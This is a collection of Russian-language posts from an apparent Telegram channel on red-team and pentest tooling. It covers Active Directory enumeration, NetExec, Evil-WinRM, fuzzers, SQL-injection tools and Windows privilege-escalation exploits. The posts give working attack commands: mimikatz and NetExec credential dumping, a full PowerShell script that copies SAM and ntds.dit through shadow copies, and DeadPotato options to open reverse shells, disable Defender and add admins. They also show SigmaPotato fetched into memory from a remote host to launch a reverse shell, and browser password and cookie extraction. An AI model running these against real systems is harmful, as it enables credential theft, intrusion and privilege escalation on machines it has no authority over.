Whitehat Lab
2.08K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security


😉 LOLAD

Проект
предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam
Базу надо знать! 👍

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName


💻 Home

#lolad #redteam #active_directory #powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😉 🔄 NetExec (nxc) v1.3

NetExec является форком и продолжением утилиты crackmapexec

Отличный инструмент для проведения пентеста 😭 Active Directory (сбор информации, пост эксплуатация, брутфорс учетных данных)

Большое кол-во фиксов, изменений - подробнее

Поддержка протоколов:

mssql
winrm
vnc
ftp
rdp
ssh
ldap
wmi
smb
nfs


Установка в 🐧 Kali:

sudo apt update && sudo apt install netexec


Скачать:

💻 Windows
💻 MacOS

💻 Home
➡️ Docs

#nxc #netexec #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🤖 APKLeaks v2.6.3

Сканер APK файлов на различные секреты, ссылки и эндпоинты. Написан на 🐍 Python

Установка:

pip3 install apkleaks

Запуск:

apkleaks -f ~/path/to/file.apk

💻 Home

#apkleaks #soft #python #reverse

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥💻 Evil-WinRM-ai v4.0 with AI LLM support

В данной версии интегрировали поддержку LLM 😄😱👍

🔩 Инструмент для подключения к 💻 Windows системам посредством WinRM (Windows Remote Management). Реализация WS-Management от 💻Microsoft. Стандартный протокол на основе SOAP, который позволяет взаимодействовать оборудованию и ОС разных производителей. Microsoft включила его в свои операционные системы, чтобы облегчить жизнь системным администраторам. По умолчанию служба работает на 5985, 5986 портах.

Установка Ollama:

curl -fsSL https://ollama.com/install.sh | sh

ollama pull llama3.1

ollama run llama3.1

# Проверка
curl -s -D - localhost:11434/api/chat -d '{"model":"llama3.1"}'


Установка Evil-WinRM:

sudo gem install evil-winrm-ai


Запуск разных моделей:

# Ollama, specifying an LLM model setting the URL of the listener containing the Ollama service

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model ollama/llama3.1

# OpenAI, specifying an LLM model and enabling the LLM commands history

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm openai --llm-api-key 'xxx' --llm-history --llm-model gpt-4o

# Gemini, just using it enabling debug mode
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm gemini --llm-api-key 'xxx' --llm-debug

# Mistral-AI, specifying an LLM model
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm mistral-ai --llm-api-key 'xxx' --llm-model open-mistral-7b


LLM опции:

--llm LLM (Ollama, Openai, Anthropic, Mistral-ai, Gemini, Azureopenai)
--llm-model модель LLM
--llm-url URL сервиса (Ollama и Azureopenai)
--llm-api-key ключ API
--llm-history история команд
--llm-debug отладка


После подключения к хосту используем команду ai: и далее наш промпт

ai:enumerate local users

ai:enumerate local groups


Возможности:

▪️ Загрузка PowerShell скриптов
▪️ Загрузка dll файлов
▪️ Запуск .NET приложений
▪️ Pass-the-hash,
▪️ Kerberos аутентификация
▪️ Поддержка SSL
▪️
Upload и Download файлов
▪️ История команд
▪️ Удобный и цветастый промпт


Запуск:

evil-winrm-ai -i 192.168.1.100 -u Adm -p 'pass' -s '/home/user/ps1_scripts/' -e '/home/user/exe_files/' --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model llama3.1:latest


💻 Home

#evilwinrm #winrm #pentest #ruby #llm #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер, написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Установка в Kali:

sudo apt update && sudo apt install -y feroxbuster


Windows
via chocolatey или winget:

choco install feroxbuster

winget install epi052.feroxbuster


Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080

cat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

feroxbuster -u https://127.1 --extract-links

feroxbuster -u https://127.1 --filter-status 301

feroxbuster -u https://127.1 --filter-regex '[aA]ccess [dD]enied.?' --output results.txt --json


💻 Home
👩‍💻 Документация

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄❗️ Trivy v 0.61.0

Сканер уязвимостей в контейнерах и не только. Написан на 💻

Цели:

▪️ Контейнеры
▪️ Файловые системы
▪️ Git репозитории (удаленный)
▪️ Образы ВМ
▪️ Kubernetes
▪️ AWS

Сканирует:

▪️ ПО и зависимости
▪️ Известные уязвимости (CVEs)
▪️ Мисконфиги
▪️ Чувствительную информацию

Установка в 🐧 Debian like:

wget https://github.com/aquasecurity/trivy/releases/download/v0.56.2/trivy_0.56.2_Linux-64bit.deb

sudo dpkg -i trivy_0.56.2_Linux-64bit.deb


Примеры:

trivy <target> [--scanners <scanner1,scanner2>] <subject>

trivy image python:3.4-alpine

trivy fs --scanners vuln,secret,misconfig myproject/

trivy k8s --report summary cluster

trivy sbom /path/to/sbom_file


💻 Github
💻 Releases
📔 Docs

#trivy #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻ApacheTomcatScanner v3.7.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Download

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🔺 Dalfox 2.10.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

Установка:
go install github.com/hahwul/dalfox/v2@latest

Пример:
dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url

💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 🗂 Доклады с конференции Black Hat USA 2024

Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”


🎃👍

💻 Home
💻 Download

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🪟 📞 DeadPotato v 1.2

Пополнение в "картофельном" семействе. Как и для остальных необходима привилегия SeImpersonatePrivilege

Возможности:

deadpotato.exe -cmd "whoami"
deadpotato.exe -rev 192.168.10.30:9001
deadpotato.exe -exe paylod.exe
deadpotato.exe -newadmin adm:pass
deadpotato.exe -shell
deadpotato.exe -mimi sam
deadpotato.exe -defender off
deadpotato.exe -sharphound


💻 Home

#lpe #windows #potato #soft #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 The LaZagne Project v2.4.6

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

📌 Список

Примеры использования:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Ghauri v1.4.2

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt


python3 setup.py install

ghauri -u 'https://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

💻 Download

#ghauri #sqli #sqlinjection #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😭 Windows dump SAM, NTDS

SAM - Security Account Manager. Хранит информацию о локальных пользователях, включая хеши паролей и идентификаторы

NTDS - основной файл ntds.dit NT Directory Services, dit - Directory Information Tree
БД в которой хранится информация обо всех объектах. Находится на контроллере домена

Есть различные варианты получить данные файлы, например с помощью mimikatz или NetExec

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"


nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --sam

nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --ntds


Доработал простенький скрипт на 🏃 PowerShell, который используя службу теневого копирования (VSS) позволит скопировать данные файлы. Необходимы повышенные привилегии

Работает на десктопных (понятно без ntds.dit) и на серверных системах, включая DC

Скрипт при необходимости создает директорию C:\Temp и копирует туда файлы, так же включает VSS и по окончании работы отключает.
Запускать в классическом 🏃 Windows PowerShell (в 7.x не отработает)

$vss=(Get-Service -name VSS)

if($vss.Status -ne "Running"){

$notrunning=1; $vss.Start()

}

$tempdir = "C:\Temp"

if (!(Test-Path $tempdir)) {

New-Item -ItemType Directory -Path $tempdir

}

$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")

cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" $tempdir
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" $tempdir

if (Test-Path -Path "C:\Windows\NTDS\ntds.dit") {

cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\ntds.dit" $tempdir

}

$volume.Delete(); if($notrunning -eq 1){

$vss.Stop()

}


Полученные файлы разбираем в 💻 Kali использую secretsdump из пакета impacket

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM


Что делать с хешиками вы уже знаете 😄👍

💻 Скрипт

#windows #sam #ntds #hashes #powershell

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 😀 RustScan v2.4.1

Очень быстрый сканер портов написанный на Rust

Установка в Debian like:

sudo dpkg -i rustscan_(ver).deb

Использование:

rustscan -a 127.0.0.1,0.0.0.0
rustscan -a 192.168.0.0/30
rustscan -a 'hosts.txt'
rustscan -a 127.0.0.1 --range 1-1000

💻 Home
💻 Download

#rustscan #rust #soft #recon

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 HackBrowserData v0.4.6

Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на 💻 Go

Поддержка браузеров в 💻 Windows:

Google Chrome
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox


Примеры использования:

hack-browser-data.exe -b all -f json --dir results --zip

hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"


💻 Home
💻 Download

#hackbrowserdata #golang #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 NTLM hashes database

Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍

🔗 https://ntlm.pw

#ntlm #hash

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Kali:
sudo apt update && sudo apt install -y feroxbuster

Windows
via chocolatey:
choco install feroxbuster

Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080


💻 Home
👩‍💻 Docs

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 SigmaPotato 1.2.6

Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege

Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.

whoami /priv

Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a

Примеры:

./SigmaPotato.exe --revshell ip port

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))


Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022


💻 Home
💻 Download

#potato #lpe #windows #soft #sigmapotato

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🎟 btconverter

При пентесте 🪟 Active Directory очень часто приходиться работать с Kerberos и в частности с получением и использованием билетов

Для данных целей обычно используют следующие инструменты:

💻 Rubeus
💻 Impacket

При дампе или запросе в Rubeus мы получим закодированный в base64 билет

Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache

Обычно это делается так:

echo "doIGIDCCBhygAwIBBaE(..snip..)9SRzE3LkxPQ0FM" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache


При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи

Для работы скрипта в 💻 Kali есть все необходимые тулзы. Если по какой то причине impacket не установлен:

sudo apt update
sudo apt install python3-impacket


Далее ставим скрипт:

wget https://raw.githubusercontent.com/akhomlyuk/btconverter/main/btconverter.sh
chmod +x btconverter.sh
sudo mv btconverter.sh /usr/bin/btconverter


На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache

btconverter ticket.b64
btconverter ticket.ccache
btconverter ticket.kirbi

Готово!

💻 Home

#kerberos #tickets #bash #impacket #rubeus

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ pspy v1.2.1

Отличный инструмент предназначенный для отслеживания процессов без необходимости использования root прав. Он позволяет видеть команды выполняемые другими пользователями, задания cron и т. д.
Написан на Go. Постоянно использую при решение машин на 🙃 HTB, 😁 THM и др. платформах.

Запуск в 🥸 Debian like:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

chmod +x pspy64
./pspy64

-r - список директорий для отслеживания (по дефолту /usr, /tmp, /etc, /home, /var и /opt)
-i - интервал в мс
-f - события файловой системы
--debug - вывод подробной информации


Готово, рекомендую!

💻 Home

#golang #pspy #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ 🔄 Moriarty v1.2

Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows

Поддерживаемые версии:

Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022


Список уязвимостей (35):

MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664


1.2 added:
2023-23397
2022-34718

👉 Описание уязвимостей

Также бот поддерживает поиск эксплоитов по CVE

!poc CVE-2019-1064

💻 Home

Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack

#moriarty #checker #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM